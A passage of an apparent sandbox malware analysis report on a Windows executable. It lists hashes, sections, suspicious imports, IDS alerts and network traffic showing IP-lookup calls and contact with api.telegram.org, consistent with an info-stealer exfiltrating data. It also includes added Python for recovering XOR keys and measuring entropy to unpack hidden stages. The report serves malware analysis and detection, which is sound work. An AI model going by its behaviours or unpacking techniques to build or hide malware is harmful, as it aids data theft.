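    happen to coincide), so the rate peaks at the period and its multiples.
    The smallest lag scoring within `tolerance` of the best is returned.
    """
    scores = {}
    for lag in range(1, max_len + 1):
        pairs = len(ct) - lag
        scores[lag] = sum(ct[i] == ct[i + lag] for i in range(pairs)) / pairs
    best = max(scores.values())
    return min(lag for lag, score in scores.items() if score >= tolerance * best)


def recover_key(ct: bytes, key_len: int, likely_plain: int = 0x00) -> bytes:
    """Per key position, the most frequent ciphertext byte XOR the byte assumed
    to dominate the plaintext (0x00 for padded binaries)."""
    return bytes(Counter(ct[pos::key_len]).most_common(1)[0][0] ^ likely_plain
                 for pos in range(key_len))


def analyze(blob: bytes):
    """Return (key length, key, decoded bytes, decoded bytes start with 'MZ')."""
    key_len = guess_key_length(blob)
    key = recover_key(blob, key_len)
    plain = xor_repeating(blob, key)
    return key_len, key, plain, plain[:2] == b"MZ"


if __name__ == "__main__":
    key_len, key, plain, is_pe = analyze(SAMPLE_CT)
    print("period:", key_len, "key:", key, "MZ header:", is_pe)
```

If the MZ check fails the period is usually still right and only the per-position plaintext guess is off; try 0x20 or 0xFF for `likely_plain`, or intersect the key candidates from two different dumps of the same stage. Run the same two steps over the real 274,944-byte dropped file to confirm or reject the hypothesis.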
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.467538006372339
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: CMR_7649.EXE.exe
File size: 1'237'203 bytes
MD5: b686bc08d9ec68d1746859235ecb70fd
SHA1: bd5a42f4351873517aee319c3abec53569bf1be9
SHA256: 4c19b3b4b58d6dac32e4b968d7e5a9fa6d30146e0680bcef4320a5079f5ed2e9
SHA512: f54f69fa8334312fd97759daa1a796669e281a5f391d876e0ee19cbb8446a39257e19b4f4eea6b1a73e4910148af00a5fb8188b9e2714f44cd8759998be864be
SSDEEP: 24576:uRmJkcoQricOIQxiZY1iaCN3mVUjjf/kwcacDzste+ODgejEJMv:7JZoQrbTFZY1iaCNrfcwFteBznv
TLSH: 0A45E121F5D69036C2B323B19E7EF76A963D69360326D19B37C82D321E605416B3A733
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
Icon Hash: 1733312925935517
Entrypoint: 0x4165c1
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE (no DYNAMIC_BASE, so the image always loads at 0x400000 without ASLR, consistent with RELOCS_STRIPPED and the empty BASERELOC directory below; no NX_COMPAT either)
Time Stamp: 0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: d3bf8a7746a8d1ee8f6e5960c3f69378
Instruction (disassembly at the entrypoint: the usual MSVC entry stub, a call followed by a jmp, then a memcpy-style copy routine with an overlap check, a test of a global flag at [004A9724h], alignment dispatch through jump tables and rep movsd; from the nop after the second `jmp dword ptr [...+ecx*4]` onward the disassembler is decoding jump-table entries such as 0x00416690 as if they were instructions, so lines like `inc cx` and `add byte ptr [eax-4BFFBE9Ah], dl` are table data, not code)
                                              call 00007F81810091CBh
                                              jmp 00007F818100003Eh
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ebp
                                              mov ebp, esp
                                              push edi
                                              push esi
                                              mov esi, dword ptr [ebp+0Ch]
                                              mov ecx, dword ptr [ebp+10h]
                                              mov edi, dword ptr [ebp+08h]
                                              mov eax, ecx
                                              mov edx, ecx
                                              add eax, esi
                                              cmp edi, esi
                                              jbe 00007F81810001BAh
                                              cmp edi, eax
                                              jc 00007F8181000356h
                                              cmp ecx, 00000080h
                                              jc 00007F81810001CEh
                                              cmp dword ptr [004A9724h], 00000000h
                                              je 00007F81810001C5h
                                              push edi
                                              push esi
                                              and edi, 0Fh
                                              and esi, 0Fh
                                              cmp edi, esi
                                              pop esi
                                              pop edi
                                              jne 00007F81810001B7h
                                              jmp 00007F8181000592h
                                              test edi, 00000003h
                                              jne 00007F81810001C6h
                                              shr ecx, 02h
                                              and edx, 03h
                                              cmp ecx, 08h
                                              jc 00007F81810001DBh
                                              rep movsd
                                              jmp dword ptr [00416740h+edx*4]
                                              mov eax, edi
                                              mov edx, 00000003h
                                              sub ecx, 04h
                                              jc 00007F81810001BEh
                                              and eax, 03h
                                              add ecx, eax
                                              jmp dword ptr [00416654h+eax*4]
                                              jmp dword ptr [00416750h+ecx*4]
                                              nop
                                              jmp dword ptr [004166D4h+ecx*4]
                                              nop
                                              inc cx
                                              add byte ptr [eax-4BFFBE9Ah], dl
                                              inc cx
                                              add byte ptr [ebx], ah
                                              ror dword ptr [edx-75F877FAh], 1
                                              inc esi
                                              add dword ptr [eax+468A0147h], ecx
                                              add al, cl
                                              jmp 00007F81834789B7h
                                              add esi, 03h
                                              add edi, 03h
                                              cmp ecx, 08h
                                              jc 00007F818100017Eh
                                              rep movsd
                                              jmp dword ptr [00000000h+edx*4]
                                              Programming Language:
                                              • [ C ] VS2010 SP1 build 40219
                                              • [C++] VS2010 SP1 build 40219
                                              • [ C ] VS2008 SP1 build 30729
                                              • [IMP] VS2008 SP1 build 30729
                                              • [ASM] VS2010 SP1 build 40219
                                              • [RES] VS2010 SP1 build 40219
                                              • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
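Two checks fall out of the section table that the report does not spell out. First, the raw sizes of the four sections add up to 0x9e400 (648,192) bytes, while the file is 1'237'203 bytes, so roughly 588 KB sit in an overlay appended after .rsrc. Second, the file-level entropy of 7.47 is higher than any single section's (the highest, .text, is 6.68), which points at that overlay as the high-entropy, probably compressed or encrypted, part of the file. The following is an added example, not the sandbox's code: the numbers are copied from the table and the File size field, and it recomputes the two per-section measures the table shows (8-bit Shannon entropy and ZLIB complexity) on constructed byte strings. The 0x400 header size and the assumption that sections are stored back to back are labelled in the code; on a real file read PointerToRawData instead.

```python
"""Sanity checks over a PE section table as printed in a sandbox report.

Added example, not part of the Joe Sandbox report. SECTIONS and FILE_SIZE are
copied from the report; the 0x400 header size and the contiguous section
layout are assumptions (the report does not print PointerToRawData).
"""
import math
import zlib

FILE_SIZE = 1_237_203          # "File size" field of the report
FILE_ENTROPY = 7.467538006372339  # "Entropy (8bit)" field of the report

# (name, virtual address, virtual size, raw size, entropy as reported)
SECTIONS = [
    (".text",  0x1000,  0x8061c, 0x80800, 6.684690148171278),
    (".rdata", 0x82000, 0xdfc0,  0xe000,  4.799741132252136),
    (".data",  0x90000, 0x1a758, 0x6800,  2.1500715391677487),
    (".rsrc",  0xab000, 0x9328,  0x9400,  5.541804843154628),
]


def overlay_size(file_size, sections, header_size=0x400):
    """Bytes after the last section's raw data, assuming sections are stored
    back to back right after header_size bytes of headers (MSVC layout)."""
    end_of_sections = header_size + sum(raw for _, _, _, raw, _ in sections)
    return max(0, file_size - end_of_sections)


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 .. 8.0, as in the report."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Compressed size over raw size; near or above 1.0 means incompressible,
    which is what packed or encrypted content looks like."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def suspicious_sections(sections, entropy_threshold=7.0):
    """Names of sections whose reported entropy reaches the threshold.
    7.0 bits/byte is a common rule of thumb, not the sandbox's own cutoff."""
    return [name for name, _, _, _, ent in sections if ent >= entropy_threshold]


def file_entropy_above_sections(file_entropy, sections) -> bool:
    """True when the whole file is higher-entropy than every section, which
    leaves the overlay as the only place the high-entropy bytes can be."""
    return file_entropy > max(ent for _, _, _, _, ent in sections)


if __name__ == "__main__":
    print("overlay bytes:", overlay_size(FILE_SIZE, SECTIONS))
    print("sections at/above 7.0:", suspicious_sections(SECTIONS))
    print("file entropy above all sections:", file_entropy_above_sections(FILE_ENTROPY, SECTIONS))
    blob = bytes(range(256)) * 4
    print("entropy %.3f complexity %.3f" % (shannon_entropy(blob), zlib_complexity(blob)))
```

None of the listed sections crosses the 7.0 rule of thumb, so the packing is not in the mapped image; carving the overlay (file offset 0x9e800 under the stated assumptions) and running the same two measures on it is the next step.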
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 (a libmagic guess; this is a string table, not a MAT file) | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-26T10:23:03.721929+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 193.122.130.0 | 80 | TCP
2024-09-26T10:23:04.534428+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49730 | 193.122.130.0 | 80 | TCP
2024-09-26T10:23:05.097635+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP
2024-09-26T10:23:05.925139+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49733 | 193.122.130.0 | 80 | TCP
2024-09-26T10:23:07.034408+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49735 | 193.122.130.0 | 80 | TCP
2024-09-26T10:23:11.903614+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49744 | 188.114.96.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Sep 26, 2024 10:23:13.028460026 CEST4974580192.168.2.4193.122.130.0
                                              Sep 26, 2024 10:23:13.031747103 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.031790018 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.031856060 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.032227039 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.032246113 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.654015064 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.654097080 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.656771898 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.656800032 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.657212019 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.658512115 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.699449062 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.896179914 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.896363020 CEST44349747149.154.167.220192.168.2.4
                                              Sep 26, 2024 10:23:13.896418095 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:13.901217937 CEST49747443192.168.2.4149.154.167.220
                                              Sep 26, 2024 10:23:19.157331944 CEST4973580192.168.2.4193.122.130.0
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Sep 26, 2024 10:23:03.091200113 CEST | 56887 | 53 | 192.168.2.4 | 1.1.1.1
                                              Sep 26, 2024 10:23:03.098345995 CEST | 53 | 56887 | 1.1.1.1 | 192.168.2.4
                                              Sep 26, 2024 10:23:03.718482018 CEST | 57119 | 53 | 192.168.2.4 | 1.1.1.1
                                              Sep 26, 2024 10:23:03.728307962 CEST | 53 | 57119 | 1.1.1.1 | 192.168.2.4
                                              Sep 26, 2024 10:23:13.023674965 CEST | 58998 | 53 | 192.168.2.4 | 1.1.1.1
                                              Sep 26, 2024 10:23:13.030961990 CEST | 53 | 58998 | 1.1.1.1 | 192.168.2.4
                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                              Sep 26, 2024 10:23:03.091200113 CEST | 192.168.2.4 | 1.1.1.1 | 0xfcbe | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
                                              Sep 26, 2024 10:23:03.718482018 CEST | 192.168.2.4 | 1.1.1.1 | 0x9da5 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
                                              Sep 26, 2024 10:23:13.023674965 CEST | 192.168.2.4 | 1.1.1.1 | 0x5bb7 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Sep 26, 2024 10:23:03.098345995 CEST | 1.1.1.1 | 192.168.2.4 | 0xfcbe | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
                                              Sep 26, 2024 10:23:03.098345995 CEST | 1.1.1.1 | 192.168.2.4 | 0xfcbe | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
                                              Sep 26, 2024 10:23:03.098345995 CEST | 1.1.1.1 | 192.168.2.4 | 0xfcbe | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
                                              Sep 26, 2024 10:23:03.098345995 CEST | 1.1.1.1 | 192.168.2.4 | 0xfcbe | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
                                              Sep 26, 2024 10:23:03.098345995 CEST | 1.1.1.1 | 192.168.2.4 | 0xfcbe | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
                                              Sep 26, 2024 10:23:03.098345995 CEST | 1.1.1.1 | 192.168.2.4 | 0xfcbe | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
                                              Sep 26, 2024 10:23:03.728307962 CEST | 1.1.1.1 | 192.168.2.4 | 0x9da5 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
